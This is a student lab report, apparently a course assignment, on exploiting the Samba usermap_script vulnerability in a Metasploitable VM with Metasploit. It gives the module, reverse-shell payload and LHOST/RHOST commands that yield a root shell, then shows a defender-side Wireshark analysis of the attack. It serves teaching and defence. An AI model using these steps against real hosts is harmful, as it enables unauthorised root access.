其他分享
首页 > 其他分享> > # 20211914涂可新 2021-2022-2 《网络攻防实践》实践七报告

# 20211914涂可新 2021-2022-2 《网络攻防实践》实践七报告

作者:互联网

20211914涂可新 2021-2022-2 《网络攻防实践》实践七报告

1.实践内容

Linux操作系统

Liunx系统大致可以分为4个层次,底层是硬件,之后是Linux操作系统,一般称之为系统内核(Kernel),中间是shell层,即命令解释层;高层则是应用层。

  1. 内核层
    内核层是Linux系统的核心和基础,他直接附着在硬件平台之上,控制和管理系统内各种资源(硬件资源和软件资源),有效地组织进程的运行,从而扩展硬件的功能,提高资源的利用率,为用户提供方便、高效、安全、可靠的应用环境。
  2. Shell层
    Shell层是与用户直接交互的界面。用户可以在提示符下输入命令行,由Shell解释执行并输出相应结果或者有关信息,所以我们也把Shell称做命令解释器,利用系统提供的丰富命令可以快捷而简便地完成许多工作。
  3. 应用层
    Linux系统上广泛应用的有Gnome、KDE等图形界面。

linux目录结构(前面有/)

bin (binaries)存放二进制可执行文件
sbin (super user binaries)存放二进制可执行文件,只有root才能访问
etc (etcetera)存放系统配置文件
home 存放用户文件的根目录
root 超级用户目录
dev (devices)用于存放设备文件
lib (library)存放跟文件系统中的程序运行所需要的共享库及内核模块
mnt (mount)系统管理员安装临时文件系统的安装点
boot 存放用于系统引导时使用的各种文件
tmp (temporary)用于存放各种临时文件
var (variable)用于存放运行时需要改变数据的文件

Samba

Samba:是在Linux和Unix上实现SMB协议的一个免费软件
结构:C/S
开放端口及对应服务:
TCP:
139 - 文件和打印共享 ; smbd (基于SMB(Server Message Block)协议,主要在局域网中使用,文件共享协议)
389 - 用于 LDAP (Active Directory Mode)
445 - NetBIOS服务在windos 2000及以后版本使用此端口, (Common Internet File System,CIFS,它是SMB协议扩展到Internet后,实现Internet文件共享)
901 - 用于 SWAT,用于网页管理Samba
UDP:
137 - NetBIOS 名字服务 ;nmbd
138 - NetBIOS 数据报服务

2.实践过程

(1)使用Metasploit进行Linux远程渗透攻击

任务:使用Metasploit渗透测试软件,攻击Linux靶机上的Samba服务Usermap_script安全漏洞,获取目标Linux靶机的主机访问权限。
实践步骤如下:
①启动Metasploit软件,可根据个人喜好使用msfconsole、msfgui、msfweb之一;
②使用exploit:exploit/multi/samba/usermap_script渗透攻击模块;
③选择攻击PAYLOAD为远程shell,(正向或反向连接均可);
④设置渗透攻击参数(RHOST,LHOST,TARGET等);
⑤执行渗透攻击;
⑥查看是否正确得到远程Shell,并查看获得的权限。

实践使用的虚拟机信息如下:

虚拟机 IP地址 网络连接
kali(攻击机) 192.168.19.149 NAT模式
MetasploitableUbuntu(靶机) 192.168.19.139 NAT模式

开始实践:
step1
启动Metasploit软件,我使用的是msfconsole。

step2
搜索靶机上的Samba服务Usermap_script安全漏洞信息,输入指令为:search usermap_script

step3
根据msfconsole给的提示:Interact with a module by name or index输入指令:use exploit/multi/samba/usermap_script以使用该攻击模块。

step4
查看该攻击模块的攻击载荷,输入指令为:show payloads

step5
要选择攻击PAYLOAD为反向远程shell,那么我们选择No.18的攻击载荷:payload/cmd/unix/reverse,输入指令为:set payload 18

step6
设置攻击参数——攻击机和靶机的IP地址,配置攻击机:set LHOST 192.168.19.149 配置靶机:set RHOST 192.168.19.139

step7
检查一下配置结果是否正确无误,输入指令:show options,由图可知,配置成功。

step8
执行渗透攻击,输入指令:exploit

step9
查看是否正确得到远程Shell与获得的权限,与靶机IP地址对比可知攻击成功,且通过输入指令whoami可知,获得了root权限。

(2)实践作业:攻防对抗实践

实践使用的虚拟机信息如下:
实践使用的虚拟机信息如下:

虚拟机 IP地址 网络连接
kali(攻击机) 192.168.19.149 NAT模式
MetasploitableUbuntu(靶机) 192.168.19.139 NAT模式

攻击方:使用 Metasploit ,选择 Metasploitable 靶机中发现的漏洞进行渗透攻击,获得远程控制权,并尝试进一步获得root权限。
step1
扫描靶机的开放端口和版本号等信息,输入指令:nmap -sV 192.168.19.139

step2
仍然使用实践(1)中的攻击模块进行攻击。

step3
攻击结果如下,已获得远程控制权与root权限。

防守方:使用 tcpdump/wireshark/snort 监听获得网络攻击的数据包文件,结合 wireshark/snort 分析攻击过程,获得攻击者的IP、目标IP和端口、攻击发起时间、攻击利用漏洞、使用Shellcode、以及成功之后在命令行输入的信息。
step1
打开wireshark,监听获得网络攻击的数据包文件,分析可知攻击者的IP为192.168.19.149、目标IP为192.168.19.139,攻击端口为139。

step2
打开第一个TCP数据包具体分析,发现攻击时间是2022年4月30日15点36分17秒。

step3
追踪第一个SMB数据包的TCP流,发现攻击机是利用4444端口与靶机建立telnet服务。

step4
进一步分析'nohup sh -c'可知使用的是shellcode,由此可知攻击利用漏洞为Samba服务usermap_script安全漏洞。


step5
进一步追踪后续的数据包的TCP流,发现攻击者在攻击成功后输入的信息。

3.学习中遇到的问题及解决

4.实践总结

本次实践是网络攻防实践课程的第七次实践,主要是进行了Linux远程渗透攻击,接第六次实践,本次实践使我在了解Metasploit软件的基础上,进一步熟悉了其使用方法。第六、七次实践都是通过某个攻击载荷进行攻击,而且渗透攻击都很深入,我们今后一定要及时检查系统漏洞、打好补丁,降低安全风险。

参考资料

标签:涂可新,使用,实践,192.168,攻击,2021,Linux,靶机
来源: https://www.cnblogs.com/tkx1914/p/16210520.html